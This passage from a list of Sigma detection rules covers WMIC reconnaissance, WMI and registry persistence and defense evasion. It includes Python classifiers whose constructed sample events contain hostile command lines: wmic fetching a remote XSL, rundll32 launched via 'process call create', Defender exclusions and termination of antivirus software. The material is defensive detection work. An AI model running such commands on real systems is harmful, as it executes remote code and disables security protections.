https://thedfirreport.com/2023/03/06/2022-year-in-review/, https://www.yeahhub.com/list-installed-programs-version-path-windows/, https://learn.microsoft.com/en-us/answers/questions/253555/software-list-inventory-wmic-product |
Potential Product Class Reconnaissance Via Wmic.EXE |
Detects the execution of WMIC in order to get a list of firewall and antivirus products |
https://github.com/albertzsigovits/malware-notes/blob/c820c7fea76cf76a861b28ebc77e06100e20ec29/Ransomware/Maze.md, https://www.hybrid-analysis.com/sample/4be06ecd234e2110bd615649fe4a6fa95403979acf889d7e45a78985eb50acf9?environmentId=1 |
Service Reconnaissance Via Wmic.EXE |
An adversary might use WMI to check whether a certain service is running on a remote device.
When the query completes, the service information is displayed if the service exists.
A common response is "No Instance(s) Available." if the queried service is not running.
A common error is "Node - (provided IP or default) ERROR Description = The RPC server is unavailable." if the remote host is unreachable
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wmic |
Uncommon System Information Discovery Via Wmic.EXE |
Detects the use of the WMI command-line (WMIC) utility to identify and display various system information,
including OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS,
and GPU driver products/versions.
Some of these commands were used by Aurora Stealer in late 2022/early 2023.
|
https://github.com/redcanaryco/atomic-red-team/blob/a2ccd19c37d0278b4ffa8583add3cf52060a5418/atomics/T1082/T1082.md#atomic-test-25---system-information-discovery-with-wmic, https://nwgat.ninja/getting-system-information-with-wmic-on-windows/, https://blog.sekoia.io/aurora-a-rising-stealer-flying-under-the-radar, https://blog.cyble.com/2023/01/18/aurora-a-stealer-using-shapeshifting-tactics/, https://app.any.run/tasks/a6aa0057-82ec-451f-8f99-55650ca537da/, https://www.virustotal.com/gui/file/d6f6bc10ae0e634ed4301d584f61418cee18e5d58ad9af72f8aa552dc4aaeca3/behavior |
Potential Unquoted Service Path Reconnaissance Via Wmic.EXE |
Detects known WMI recon method to look for unquoted service paths using wmic. Often used by pentester and attacker enumeration scripts |
https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py, https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1, https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ |
System Disk And Volume Reconnaissance Via Wmic.EXE |
An adversary might use WMI to discover information about the system, such as the volume name, size,
free space, and other disk information. This can be done using the `wmic` command-line utility and has been
observed being used by threat actors such as Volt Typhoon.
|
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-144a, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wmic |
WMIC Remote Command Execution |
Detects the execution of WMIC to query information on a remote system |
https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wmic |
Service Started/Stopped Via Wmic.EXE |
Detects usage of wmic to start or stop a service |
https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html |
Potential SquiblyTwo Technique Execution |
Detects potential SquiblyTwo attack technique with possible renamed WMIC via Imphash and OriginalFileName fields |
https://web.archive.org/web/20190209154607/https://subt0x11.blogspot.com/2018/04/wmicexe-whitelisting-bypass-hacking.html, https://twitter.com/mattifestation/status/986280382042595328, https://atomicredteam.io/defense-evasion/T1220/, https://lolbas-project.github.io/lolbas/Binaries/Wmic/ |
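Both the "Renamed Visual Studio Code Tunnel Execution" rule above and the SquiblyTwo rule here face the same problem: the on-disk file name is attacker-controlled, so the binary has to be identified by the OriginalFileName carried in its PE version resource (the SquiblyTwo rule adds Imphash as a second signal). The following is an added example (not Sigma's rule logic or any project code) of that identification over constructed events. It assumes the VS Code CLI reports "code.exe" as its OriginalFileName and that wmic's is "wmic.exe"; the command lines and paths are constructed.

```python
# Constructed sample process-creation events carrying the PE version-info
# name (Sysmon's OriginalFileName); none of these are real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe", "OriginalFileName": "wmic.exe",
     "CommandLine": 'wmic os get /format:"https://example.invalid/view.xsl"'},
    {"Image": r"C:\Users\Public\svchost.exe", "OriginalFileName": "wmic.exe",
     "CommandLine": 'svchost.exe process get /format:"http://203.0.113.10/a.xsl"'},
    {"Image": r"C:\Users\Public\update.exe", "OriginalFileName": "code.exe",
     "CommandLine": "update.exe tunnel --accept-server-license-terms"},
    {"Image": r"C:\Program Files\Microsoft VS Code\bin\code.exe", "OriginalFileName": "code.exe",
     "CommandLine": "code.exe tunnel"},
    {"Image": r"C:\Users\Public\update.exe", "OriginalFileName": "",
     "CommandLine": "update.exe tunnel --accept-server-license-terms"},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe", "OriginalFileName": "wmic.exe",
     "CommandLine": "wmic os get caption"},
]

# Tracked binaries keyed by OriginalFileName (assumed for code.exe), each with
# the command-line condition that makes the execution interesting.
LOLBINS = {
    "wmic.exe": ("squiblytwo", lambda c: "/format:" in c and "http" in c),
    "code.exe": ("vscode_tunnel", lambda c: "tunnel" in c.split()),
}


def basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def analyze(event):
    """Return (label, renamed) for a tracked LOLBin technique, else None.

    The binary is identified by OriginalFileName first and by the on-disk
    name second, so a copy renamed to svchost.exe is still recognised as wmic.
    """
    on_disk = basename(event.get("Image", ""))
    ofn = event.get("OriginalFileName", "").lower()
    identity = ofn if ofn in LOLBINS else (on_disk if on_disk in LOLBINS else None)
    if identity is None:
        return None
    label, matcher = LOLBINS[identity]
    if not matcher(event.get("CommandLine", "").lower()):
        return None
    renamed = on_disk != identity
    return (("renamed_" + label) if renamed else label, renamed)


def scan(events):
    """Return (index, label, renamed) for every matching event."""
    hits = []
    for i, event in enumerate(events):
        result = analyze(event)
        if result:
            hits.append((i, result[0], result[1]))
    return hits


if __name__ == "__main__":
    for i, label, renamed in scan(SAMPLE_EVENTS):
        print(i, label, "renamed" if renamed else "", SAMPLE_EVENTS[i]["Image"])
```

The fifth sample shows the limit of this approach: with the version resource stripped, neither name identifies the binary, which is why the SquiblyTwo rule also matches on Imphash and why a tunnel rule should additionally key on the "tunnel" argument pattern itself.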
Suspicious WMIC Execution Via Office Process |
Detects an Office application calling wmic to proxy execution through a LOLBIN process. This is often used to break the suspicious parent-child chain (Office app spawns LOLBin). |
https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/, https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml |
Suspicious Process Created Via Wmic.EXE |
Detects WMIC executing "process call create" with suspicious calls to processes such as "rundll32", "regsvr32", etc. |
https://thedfirreport.com/2020/10/08/ryuks-return/, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker |
Application Terminated Via Wmic.EXE |
Detects calls to the "terminate" function via wmic in order to kill an application |
https://cyble.com/blog/lockfile-ransomware-using-proxyshell-attack-to-deploy-ransomware/, https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf |
Application Removed Via Wmic.EXE |
Detects the removal or uninstallation of an application via "Wmic.EXE". |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-10---application-uninstall-using-wmic |
Potential Tampering With Security Products Via WMIC |
Detects uninstallation or termination of security products using the WMIC utility |
https://twitter.com/cglyer/status/1355171195654709249, https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/, https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions, https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/, https://www.trendmicro.com/en_us/research/23/a/vice-society-ransomware-group-targets-manufacturing-companies.html |
XSL Script Execution Via WMIC.EXE |
Detects the execution of WMIC with the "format" flag to potentially load XSL files.
Adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.
Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md |
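The wmic rules from "New ActiveScriptEventConsumer Created Via Wmic.EXE" down to "XSL Script Execution Via WMIC.EXE" all dissect the same command line: global switches (/node:, /namespace:), the alias or class, the verb (get, list, call create, call terminate) and the parent process. As an added example (not Sigma's rule logic or any project code), the classifier below runs that dissection over constructed events and emits one label per rule; the alias-to-label map, the suspicious child list and the security-product name fragments are assumptions for illustration, not the curated lists the real rules carry.

```python
# Constructed sample events (Sysmon-style fields); none are real telemetry.
SAMPLES = {
    "consumer": {"ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine":
        r'wmic /NAMESPACE:"\\root\subscription" PATH ActiveScriptEventConsumer CREATE Name="Updater", ScriptingEngine="JScript", ScriptText="..."'},
    "defender": {"ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine":
        r'wmic /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath="C:\Users\Public"'},
    "create": {"ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine":
        r'wmic process call create "rundll32.exe C:\Users\Public\x.dll,Start"'},
    "office": {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "CommandLine":
        r'wmic process call create "cmd.exe /c start C:\Users\Public\a.bat"'},
    "remote": {"ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine":
        'wmic /node:"10.0.0.5" /user:corp\\svc os get caption'},
    "unquoted": {"ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine":
        "wmic service get name,displayname,pathname,startmode"},
    "stop": {"ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine":
        'wmic service where name="ExampleAntivirusSvc" call stopservice'},
    "kill_av": {"ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine":
        'wmic process where name="ExampleAntivirus.exe" call terminate'},
    "uninstall": {"ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine":
        'wmic product where name="Example Endpoint Protection" call uninstall /nointeractive'},
    "xsl": {"ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine":
        'wmic os get /format:"https://example.invalid/view.xsl"'},
    "qfe": {"ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine":
        "wmic qfe get hotfixid,installedon"},
    "group": {"ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine":
        "wmic group get name,sid"},
}

RECON_ALIASES = {  # wmic alias -> rule label, applied only with a get/list verb (assumed map)
    "computersystem": "computersystem_recon", "group": "local_group_recon",
    "csproduct": "hardware_model_recon", "qfe": "hotfix_recon",
    "process": "process_recon", "product": "product_recon",
    "service": "service_recon", "os": "system_info_recon", "cpu": "system_info_recon",
    "bios": "system_info_recon", "baseboard": "system_info_recon",
    "logicaldisk": "disk_volume_recon", "volume": "disk_volume_recon",
}
SUSPICIOUS_CHILDREN = ("rundll32", "regsvr32", "mshta", "powershell", "cmd.exe",
                       "wscript", "cscript", "certutil", "bitsadmin")   # assumed list
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SECURITY_HINTS = ("antivirus", "endpoint protection", "defender")       # illustrative only


def first_alias(tokens):
    """The alias/class a wmic command operates on: the first token after the
    binary that is not a global switch such as /node: or /namespace:."""
    rest = [t for t in tokens[1:] if not t.startswith("/")]
    if rest and rest[0] == "path" and len(rest) > 1:
        return rest[1]
    return rest[0] if rest else ""


def classify_wmic(event):
    """Return the list of rule labels one wmic event triggers."""
    low = event.get("CommandLine", "").lower()
    tokens = low.split()
    parent = event.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
    labels = []
    if "activescripteventconsumer" in low and "create" in tokens:
        labels.append("event_consumer_created")
    if "msft_mppreference" in low and "call add" in low:
        labels.append("defender_tampering")
    if any(t.startswith("/node:") for t in tokens):
        labels.append("remote_execution")
    if "process call create" in low:
        labels.append("process_created")
        target = low.split("process call create", 1)[1]   # only the spawned command matters
        if any(child in target for child in SUSPICIOUS_CHILDREN):
            labels.append("suspicious_process_created")
    if "/format:" in low:
        labels.append("xsl_script_execution")
    if "call terminate" in low:
        labels.append("application_terminated")
    if "call uninstall" in low:
        labels.append("application_removed")
    if "call startservice" in low or "call stopservice" in low:
        labels.append("service_start_stop")
    destructive = ("call terminate", "call uninstall", "call stopservice")
    if any(d in low for d in destructive) and any(h in low for h in SECURITY_HINTS):
        labels.append("security_product_tampering")
    alias = first_alias(tokens)
    if alias in RECON_ALIASES and ("get" in tokens or "list" in tokens):
        labels.append(RECON_ALIASES[alias])
        if alias == "service" and "pathname" in low:   # the unquoted-service-path query
            labels.append("unquoted_service_path_recon")
    if parent in OFFICE_PARENTS:
        labels.append("office_parent")
    return labels


def scan(samples):
    return {name: classify_wmic(ev) for name, ev in samples.items()}


if __name__ == "__main__":
    for name, labels in scan(SAMPLES).items():
        print(f"{name:10} {labels}")
```

Two design points carry over to real rules: the alias is read only after skipping global switches, otherwise "/node:" queries are misclassified, and recon labels require a get/list verb so that "process where ... call terminate" does not also count as process reconnaissance.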
WmiPrvSE Spawned A Process |
Detects WmiPrvSE spawning a process |
https://threathunterplaybook.com/hunts/windows/190815-RemoteServiceInstallation/notebook.html |
Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell |
Detects PowerShell as a child of the WmiPrvSE process, which could be a sign of lateral movement via WMI. |
https://any.run/report/68bc255f9b0db6a0d30a8f2dadfbee3256acfe12497bf93943bc1eab0735e45e/a2385d6f-34f7-403c-90d3-b1f9d2a90a5e |
Suspicious WmiPrvSE Child Process |
Detects suspicious and uncommon child processes of WmiPrvSE |
https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/, https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml, https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/, https://twitter.com/ForensicITGuy/status/1334734244120309760 |
WMI Backdoor Exchange Transport Agent |
Detects a WMI backdoor in Exchange Transport Agents via WMI event filters |
https://twitter.com/cglyer/status/1182389676876980224, https://twitter.com/cglyer/status/1182391019633029120 |
WMI Persistence - Script Event Consumer |
Detects WMI script event consumers |
https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/ |
UEFI Persistence Via Wpbbin - ProcessCreation |
Detects execution of the binary "wpbbin" which is used as part of the UEFI based persistence method described in the reference section |
https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c, https://persistence-info.github.io/Data/wpbbin.html |
Potential Dropper Script Execution Via WScript/CScript |
Detects wscript/cscript executions of scripts located in user directories |
https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/, https://redcanary.com/blog/gootloader/ |
Cscript/Wscript Potentially Suspicious Child Process |
Detects potentially suspicious child processes of Wscript/Cscript. These include processes such as rundll32 with uncommon exports or PowerShell spawning rundll32 or regsvr32.
Malware such as Pikabot and Qakbot, among many others, has been seen using similar techniques.
|
Internal Research, https://github.com/pr0xylife/Pikabot/blob/main/Pikabot_30.10.2023.txt, https://github.com/pr0xylife/Pikabot/blob/main/Pikabot_22.12.2023.txt |
Cscript/Wscript Uncommon Script Extension Execution |
Detects Wscript/Cscript executing a file with an uncommon (i.e. non-script) extension |
Internal Research |
WSL Child Process Anomaly |
Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL |
https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/, https://twitter.com/nas_bench/status/1535431474429808642 |
Windows Binary Executed From WSL |
Detects the execution of Windows binaries from within a WSL instance.
This could be used to masquerade parent-child relationships
|
Internal Research |
Proxy Execution Via Wuauclt.EXE |
Detects the use of the Windows Update Client binary (wuauclt.exe) for proxy execution. |
https://dtm.uk/wuauclt/, https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/ |
Suspicious Windows Update Agent Empty Cmdline |
Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags
|
https://redcanary.com/blog/blackbyte-ransomware/ |
Cab File Extraction Via Wusa.EXE From Potentially Suspicious Paths |
Detects the execution of the "wusa.exe" (Windows Update Standalone Installer) utility to extract ".cab" files using the "/extract" argument from potentially suspicious paths.
|
https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html, https://www.echotrail.io/insights/search/wusa.exe/ |
Wusa.EXE Executed By Parent Process Located In Suspicious Location |
Detects execution of the "wusa.exe" (Windows Update Standalone Installer) utility by a parent process that is located in a suspicious location.
Attackers could instantiate an instance of "wusa.exe" in order to bypass User Account Control (UAC). They can duplicate the access token from "wusa.exe" to gain elevated privileges.
|
https://www.fortinet.com/blog/threat-research/konni-campaign-distributed-via-malicious-document |
Xwizard.EXE Execution From Non-Default Location |
Detects the execution of Xwizard tool from a non-default directory.
When executed from a non-default directory, this utility can be abused in order to side load a custom version of "xwizards.dll".
|
https://lolbas-project.github.io/lolbas/Binaries/Xwizard/, http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/ |
COM Object Execution via Xwizard.EXE |
Detects the execution of Xwizard tool with the "RunWizard" flag and a GUID like argument.
This utility can be abused in order to run a custom COM object created in the registry.
|
https://lolbas-project.github.io/lolbas/Binaries/Xwizard/, https://www.elastic.co/guide/en/security/current/execution-of-com-object-via-xwizard.html, https://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/ |
Potential Process Hollowing Activity |
Detects when a memory process image does not match the disk image, indicative of process hollowing. |
https://twitter.com/SecurePeacock/status/1486054048390332423?s=20, https://www.bleepingcomputer.com/news/microsoft/microsoft-sysmon-now-detects-malware-process-tampering-attempts/ |
Potential Defense Evasion Via Raw Disk Access By Uncommon Tools |
Detects raw disk access using uncommon tools or tools that are located in suspicious locations (heavy filtering is required), which could indicate possible defense evasion attempts |
https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment |
Potential NetWire RAT Activity - Registry |
Detects registry keys related to NetWire RAT |
https://www.fortinet.com/blog/threat-research/new-netwire-rat-variant-spread-by-phishing, https://resources.infosecinstitute.com/topic/netwire-malware-what-it-is-how-it-works-and-how-to-prevent-it-malware-spotlight/, https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/, https://blogs.blackberry.com/en/2021/09/threat-thursday-netwire-rat-is-coming-down-the-line, https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/ |
Potential Persistence Via New AMSI Providers - Registry |
Detects when an attacker registers a new AMSI provider in order to achieve persistence |
https://persistence-info.github.io/Data/amsi.html, https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/FakeAMSI/FakeAMSI.c |
Potential COM Object Hijacking Via TreatAs Subkey - Registry |
Detects COM object hijacking via TreatAs subkey |
https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/ |
Potential Persistence Via Disk Cleanup Handler - Registry |
Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence.
The disk cleanup manager is part of the operating system. It displays the dialog box […]
The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.
Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.
Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.
Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.
|
https://persistence-info.github.io/Data/diskcleanuphandler.html, https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/ |
Potential Persistence Via Logon Scripts - Registry |
Detects creation of "UserInitMprLogonScript" registry value which can be used as a persistence method by malicious actors |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1037.001/T1037.001.md |
PUA - Sysinternal Tool Execution - Registry |
Detects the execution of a Sysinternals Tool via the creation of the "accepteula" registry key |
https://twitter.com/Moti_B/status/1008587936735035392 |
Suspicious Execution Of Renamed Sysinternals Tools - Registry |
Detects the creation of the "accepteula" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool) |
Internal Research |
PUA - Sysinternals Tools Execution - Registry |
Detects the execution of some potentially unwanted tools such as PsExec, Procdump, etc. (part of the Sysinternals suite) via the creation of the "accepteula" registry key. |
https://twitter.com/Moti_B/status/1008587936735035392 |
Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted |
Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" registry value.
Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities.
This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.
|
https://learn.microsoft.com/en-us/windows/client-management/manage-recall, https://learn.microsoft.com/en-us/windows/client-management/mdm/policy-csp-windowsai#disableaidataanalysis |
Folder Removed From Exploit Guard ProtectedFolders List - Registry |
Detects the removal of folders from the "ProtectedFolders" list of Exploit Guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder |
https://www.microsoft.com/security/blog/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/ |
Terminal Server Client Connection History Cleared - Registry |
Detects the deletion of registry keys containing the MSTSC connection history |
https://learn.microsoft.com/en-us/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer, http://woshub.com/how-to-clear-rdp-connections-history/, https://www.trendmicro.com/en_us/research/23/a/vice-society-ransomware-group-targets-manufacturing-companies.html |
Removal Of AMSI Provider Registry Keys |
Detects the deletion of AMSI provider registry key entries in HKLM\Software\Microsoft\AMSI. This technique could be used by an attacker in order to disable AMSI inspection. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://seclists.org/fulldisclosure/2020/Mar/45 |
Removal of Potential COM Hijacking Registry Keys |
Detects any deletion of entries in ".*\shell\open\command" registry keys.
These registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could indicate steps to remove its tracks.
|
https://github.com/OTRF/detection-hackathon-apt29/issues/7, https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.md, https://learn.microsoft.com/en-us/windows/win32/shell/launch, https://learn.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand, https://learn.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code |
Removal Of Index Value to Hide Schedule Task - Registry |
Detects when the "index" value of a scheduled task is removed or deleted from the registry, which effectively hides it from any tooling such as "schtasks /query" |
https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments |
Removal Of SD Value to Hide Schedule Task - Registry |
Detects the removal of the SD (Security Descriptor) value in the \Schedule\TaskCache\Tree registry hive to hide a scheduled task. This technique is used by Tarrask malware |
https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/ |
Creation of a Local Hidden User Account by Registry |
Sysmon registry detection of a local hidden user account. |
https://twitter.com/SBousseaden/status/1387530414185664538 |
Pandemic Registry Key |
Detects Pandemic Windows Implant |
https://wikileaks.org/vault7/#Pandemic, https://twitter.com/MalwareJake/status/870349480356454401 |
UAC Bypass Via Wsreset |
Detects an unfixed UAC bypass method on Windows 10 that abuses WSReset.exe, a file associated with the Windows Store. It will run a binary file referenced from a low-privilege registry key. |
https://www.bleepingcomputer.com/news/security/trickbot-uses-a-new-windows-10-uac-bypass-to-launch-quietly, https://lolbas-project.github.io/lolbas/Binaries/Wsreset |
CMSTP Execution Registry Event |
Detects various indicators of Microsoft Connection Manager Profile Installer execution |
https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/ |
Disable Security Events Logging Adding Reg Key MiniNt |
Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, the Windows Event Log service will stop writing events. |
https://twitter.com/0gtweet/status/1182516740955226112 |
Esentutl Volume Shadow Copy Service Keys |
Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\System\CurrentControlSet\Services\VSS\Diag\VolSnap\Volume are captured. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy |
Wdigest CredGuard Registry Modification |
Detects potential malicious modification of the property value of IsCredGuardEnabled under
HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to disable Credential Guard on a system.
This is usually used together with UseLogonCredential to manipulate credential caching.
|
https://teamhydra.blog/2020/08/25/bypassing-credential-guard/ |
Windows Credential Editor Registry |
Detects the use of Windows Credential Editor (WCE) |
https://www.ampliasecurity.com/research/windows-credentials-editor/ |
HybridConnectionManager Service Installation - Registry |
Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from an Azure function. |
https://twitter.com/Cyb3rWard0g/status/1381642789369286662 |
Registry Entries For Azorult Malware |
Detects the presence of a registry key created during Azorult execution |
https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/trojan.win32.azoruit.a |
Potential Qakbot Registry Activity |
Detects a registry key used by IcedID in a campaign that distributes malicious OneNote files |
https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution |
PrinterNightmare Mimikatz Driver Name |
Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527 |
https://github.com/gentilkiwi/mimikatz/commit/c21276072b3f2a47a21e215a46962a17d54b3760, https://www.lexjansen.com/sesug/1993/SESUG93035.pdf, https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913, https://nvd.nist.gov/vuln/detail/cve-2021-1675, https://nvd.nist.gov/vuln/detail/cve-2021-34527 |
Path To Screensaver Binary Modified |
Detects modification of the registry value containing the path to the binary used as a screensaver. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md, https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf |
Narrator's Feedback-Hub Persistence |
Detects abuse of the Windows 10 Narrator's Feedback-Hub |
https://giuliocomi.blogspot.com/2019/10/abusing-windows-10-narrators-feedback.html |
New DLL Added to AppCertDlls Registry Key |
Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key can be abused to obtain persistence and privilege escalation
by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.
|
http://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/, https://eqllib.readthedocs.io/en/latest/analytics/14f90406-10a0-4d36-a672-31cabe149f2f.html |
NetNTLM Downgrade Attack - Registry |
Detects NetNTLM downgrade attack |
https://web.archive.org/web/20171113231705/https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks, https://www.ultimatewindowssecurity.com/wiki/page.aspx?spid=NSrpcservers |
New DLL Added to AppInit_DLLs Registry Key |
DLLs that are specified in the AppInit_DLLs value in the Registry key HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows are loaded by user32.dll into every process that loads user32.dll |
https://eqllib.readthedocs.io/en/latest/analytics/822dc4c5-b355-4df8-bd37-29c458997b8f.html |
Office Application Startup - Office Test |
Detects the addition of the Office Test registry key, which allows a user to specify an arbitrary DLL that will be executed every time an Office application is started |
https://unit42.paloaltonetworks.com/unit42-technical-walkthrough-office-test-persistence-method-used-in-recent-sofacy-attacks/ |
Windows Registry Trust Record Modification |
Alerts on trust record modification within the registry, indicating usage of macros |
https://outflank.nl/blog/2018/01/16/hunting-for-evil-detect-macros-being-executed/, http://az4n6.blogspot.com/2016/02/more-on-trust-records-macros-and.html, https://twitter.com/inversecos/status/1494174785621819397 |
Registry Persistence Mechanisms in Recycle Bin |
Detects persistence registry keys for Recycle Bin |
https://github.com/vxunderground/VXUG-Papers/blob/751edb8d50f95bd7baa730adf2c6c3bb1b034276/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf, https://persistence-info.github.io/Data/recyclebin.html, https://www.hexacorn.com/blog/2018/05/28/beyond-good-ol-run-key-part-78-2/ |
New PortProxy Registry Entry Added |
Detects the modification of the PortProxy registry key which is used for port forwarding. |
https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html, https://adepts.of0x.cc/netsh-portproxy-code/, https://www.dfirnotes.net/portproxy_detection/ |
RedMimicry Winnti Playbook Registry Manipulation |
Detects actions caused by the RedMimicry Winnti playbook |
https://redmimicry.com |
WINEKEY Registry Modification |
Detects potential malicious modification of run keys by winekey or team9 backdoor |
https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html |
Run Once Task Configuration in Registry |
